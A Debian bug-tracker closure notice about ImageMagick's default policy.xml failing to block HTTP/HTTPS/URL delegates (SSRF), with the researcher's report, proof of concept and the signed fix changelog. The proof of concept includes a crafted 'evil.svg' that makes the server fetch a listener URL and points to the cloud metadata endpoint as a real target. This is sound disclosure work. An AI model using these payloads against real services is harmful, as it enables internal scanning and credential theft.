Bug#1140176: marked as done (imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918))

[Debian Bug Tracking System]

Your message dated Wed, 24 Jun 2026 21:02:59 +0000
with message-id <e1wcukn-00000001598-4...@fasolo.debian.org>
and subject line Bug#1140176: fixed in imagemagick 8:6.9.11.60+dfsg-1.6+deb12u11
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are 
no-ops (SSRF, CWE-918)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch

Dear Maintainer,

The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:

  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />

These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).

Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.

The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.

Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.

1. Minimal listener:

   python3 -c 'import http.server,socketserver
   class H(http.server.BaseHTTPRequestHandler):
    def do_GET(s): print("SSRF:",s.path); s.send_response(200);
s.end_headers(); s.wfile.write(b"GIF89a;")
    def log_message(s,*a): pass
   socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'

2. Confirm the restrictive policy is active (this is correctly blocked):

   echo x > /tmp/q.txt
   magick label:@/tmp/q.txt /tmp/q.png
   -> magick: attempt to perform an operation not allowed by the
      security policy `@/tmp/q.txt'

3. PoC 1 -- direct URL coder:

   magick http://127.0.0.1:7777/ssrf out.png
   -> listener logs: SSRF: /ssrf

4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):

   printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink"; width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf"; width="10"
height="10"/></svg>' > evil.svg
   magick evil.svg out.png
   -> listener logs: SSRF: /svg-ssrf

Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.

Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.

Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:

  <policy domain="coder" rights="none"
pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />

(keeping the existing @* path rule). Verify with:

  magick http://127.0.0.1:1/x x.png

which must be rejected by policy, not merely fail to connect.

Bastien Rouccaries has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.

Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.

Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
maramsaiharsh...@gmail.com

--- End Message ---

--- Begin Message ---

Source: imagemagick
Source-Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Done: Bastien Roucariès <ro...@debian.org>

We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1140...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <ro...@debian.org> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 21 Jun 2026 15:40:05 +0200
Source: imagemagick
Architecture: source
Version: 8:6.9.11.60+dfsg-1.6+deb12u11
Distribution: bookworm-security
Urgency: high
Maintainer: ImageMagick Packaging Team 
<pkg-gmagick-im-t...@lists.alioth.debian.org>
Changed-By: Bastien Roucariès <ro...@debian.org>
Closes: 1140176
Changes:
 imagemagick (8:6.9.11.60+dfsg-1.6+deb12u11) bookworm-security; urgency=high
 .
   * Fix CVE-2026-48733:
     An infinite loop in the subimage-search operation can happen
     when using a crafted image.
   * Fix CVE-2026-48734:
     A crafted MVG file could result in a stack overflow due to a missing depth
     or visited-set check
   * Fix CVE-2026-48994:
     A missing check of a return value could lead to a heap buffer over-write 
in the MAT
     decoder on 32-bit systems.
   * Fix CVE-2026-49218:
     A missing check in the DCM decoder could result in an image with invalid 
dimensions
     and that could cause crashes in other operation.
   * Fix CVE-2026-53460:
     A missing check for maximum memory request in AcquireAlignedMemory
     could trigger an out-of-Memory condition.
   * Fix CVE-2026-53463:
     When passing incorrect arguments in the distort operation a
     null pointer deference will occur.
   * Fix default policy.xml HTTP/HTTPS/URL delegate rules are no-ops
     (Closes: #1140176)
Checksums-Sha1:
 c3f16669cff11f4e0b18a0d86d3bfd20477243b3 5134 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 824a63dce5e54bd8b78077d671d8ab06300a8848 9395144 
imagemagick_6.9.11.60+dfsg.orig.tar.xz
 3886314169eaaacb6cccab42640a3d03688f480d 337148 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 752aa4d804c3efbab1be821483cf05cda548765c 8516 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Checksums-Sha256:
 bc7cfc2484b72d4791be7785a0a251c8d55508975f70d794bd14cee73d06caef 5134 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 472fb516df842ee9c819ed80099c188463b9e961303511c36ae24d0eaa8959c4 9395144 
imagemagick_6.9.11.60+dfsg.orig.tar.xz
 7782105ca00f7a22dbc353b37b5da89414379545defce3986e0e1726631afd82 337148 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 b37363b9b3877324003befe138e26b3bddc09c2fb41e4e0969893504b0d72142 8516 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo
Files:
 399311662b1e0251a24ec17ff9df279c 5134 graphics optional 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.dsc
 8b8f7b82bd1299cf30aa3c488c46a3cd 9395144 graphics optional 
imagemagick_6.9.11.60+dfsg.orig.tar.xz
 d36a95688c1ef54ade52609eafa870bb 337148 graphics optional 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11.debian.tar.xz
 a3d8eeeab7895c18dcef5af365f63dc7 8516 graphics optional 
imagemagick_6.9.11.60+dfsg-1.6+deb12u11_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmo4HSsACgkQADoaLapB
CF+hSg/9FnxizYDr9PiDXedH+rSFGR0AgfK6JzbpmJtenlu0lGvBAqPp2OVXtMlw
4c9JYhkLXcaN9o7dbHaTRYnq6dFrlUUH6RA13oLasVG+vwG0joiCJosyPMk9TNlh
1IGU5lNNxht45+8skahfa8NBF/yhvsbJBIyoKGsf/XJRCaOfMsAlVlkbbnpjNNSX
pwgieYZh+1nQcBCJgYS3RpV5MS7E95f9mvyyU9KU/0lNuCGxGL+y9CbLfyVl6+K3
tg8lHw+lBruwB+s6h2s2XNxwjCJ8kRQdE0Vk2yuFkHx1UeBXCOa9cb9m4M1a8NJY
j6EaxAc2BemWK3HY8DbzpgvrAdRSlWZN0Ewpi00CmrTZdrYisc3R55WVzoy3y2ur
/gxOw3I/Bi2G6kcjvqGyZTjBiYJvR+4Vbvf+yAOOqIBC3hZspkWdirOsXtSQgrK9
bs2R6Sx0WOh1T0IhCl//8HfHvd9ftIHdiueFN9ombUXi/KBLyyLj6WcUojBk+O+n
FbzMOAMUJspORXx3/gGUhMiX1QfK5GocM9gWdqCnrKNUuqFHPNmxkvKsIIrDOQDm
ZiQsleURPVuAcOVQ3TnR86B8ZyLwgn9rIloNvGsRyacueBcnFbOLZ8KuJcH5ICLs
fmmO44rm/2n9Bb/UqAjBVIHjhCqFDE+h7tyXqGR+LvCC+tDwHWE=
=0a1r
-----END PGP SIGNATURE-----

pgpkyvmzJzEPj.pgp
Description: PGP signature

--- End Message ---